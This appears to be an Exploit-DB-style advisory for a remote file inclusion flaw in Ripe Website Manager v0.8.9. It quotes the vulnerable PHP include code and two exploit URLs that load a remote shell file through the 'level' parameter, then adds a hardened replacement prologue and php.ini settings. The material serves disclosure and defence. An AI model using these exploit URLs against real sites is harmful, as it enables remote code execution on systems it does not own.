Vendor: Ripe Website Manager
By: BlackNDoor
CVSS: 7.5 (HIGH)
CWE: Remote File Include
Product Name: Ripe Website Manager
Affected Version From: v0.8.9 and below
Affected Version To: v0.8.9
Patch Exists: NO
2007

Ripe Website Manager Remote File Include Vulnerability

The Ripe Website Manager script (version <= v0.8.9) is vulnerable to remote file inclusion. The vulnerability can be exploited by including arbitrary files via the 'level' parameter in the 'author_panel_header.php' and 'admin_header.php' scripts. An attacker can craft a malicious URL and execute arbitrary code on the target system.

Mitigation:

To mitigate this vulnerability, it is recommended to update the Ripe Website Manager script to a version higher than v0.8.9 or apply any available patches or fixes provided by the vendor.

Exploit-DB raw data:

#Author::   BlackNDoor | blackndoor@learntohell.net
#Homepage:: www.learntohell.net
#
#Script::   Ripe Website Manager
#Version::  <= v0.8.9
#Type::     Remote File Include
#
#Source::   http://sourceforge.net/project/showfiles.php?group_id=194532

#Bug::
   -> Files:

      /admin/includes/author_panel_header.php
      /admin/includes/admin_header.php

   -> vulncode:

      <?php
         ...
         define("LEVEL", $level); // directory level
         
         // includes
           require(LEVEL.'../includes/config.php');
         ...
      ?>

#Exploit::

   http://www.site.com/[path to ripe]/admin/includes/author_panel_header.php?level=shell.txt?
   http://www.site.com/[path to ripe]/admin/includes/admin_header.php?level=shell.txt?

#thanks:: str0ke

# milw0rm.com [2007-06-30]
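
A hardened form of the header prologue shown under "vulncode", as an added example; it is not code from the advisory or from the Ripe project. It assumes the two header files are only ever included by other scripts and that a legitimate directory level is a short run of "../" segments. The helper name ripe_safe_level and the depth limit of four are hypothetical.

```php
<?php
// Added example, not Ripe's own code. Hardened prologue for
// admin/includes/author_panel_header.php and admin_header.php.

// Assumption: these headers are meant to be include()d, never requested
// directly, so a direct HTTP request to this file is refused.
if (isset($_SERVER['SCRIPT_FILENAME'])
    && realpath($_SERVER['SCRIPT_FILENAME']) === realpath(__FILE__)) {
    header('HTTP/1.1 403 Forbidden');
    exit('Forbidden');
}

/**
 * Hypothetical helper: accept only a run of "../" segments as the
 * directory level. Anything else (URL scheme, host name, file name,
 * NUL byte, array or other non-string) falls back to the empty prefix.
 * The limit of four segments is an assumed maximum nesting depth.
 */
function ripe_safe_level($candidate)
{
    if (is_string($candidate)
        && preg_match('#\A(?:\.\./){0,4}\z#', $candidate) === 1) {
        return $candidate;
    }
    return '';
}

// $level is expected to be set by the including script. If a request
// value is imported into it instead, only "../" runs survive the check,
// so the require below can no longer be pointed at another file or host.
$level = ripe_safe_level(isset($level) ? $level : '');
define('LEVEL', $level);

// Same include as the original, now with a constrained prefix.
require LEVEL . '../includes/config.php';
```

Independently of the code change, setting `allow_url_include = Off` and `register_globals = Off` in php.ini reduces exposure to this class of bug.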